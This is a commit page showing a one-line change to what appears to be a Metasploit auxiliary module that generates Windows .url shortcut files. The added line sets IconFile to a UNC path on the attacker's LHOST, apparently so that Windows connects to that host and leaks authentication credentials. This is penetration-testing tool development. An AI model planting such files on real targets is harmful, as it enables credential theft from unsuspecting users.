Minor Improvement
URL File Creation also supports IconFile - this has now been addedGSoC/Meterpreter_Web_Console
parent
16fcaa3d00
commit
f4334828d0
|
@ -136,6 +136,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
url=""
|
||||
url << "[InternetShortcut]\n"
|
||||
url << "URL=file://#{datastore['LHOST']}/url.html"
|
||||
url << "IconFile=\\\\#{datastore['LHOST']}\\icon.ico\n"
|
||||
|
||||
file_create(url)
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue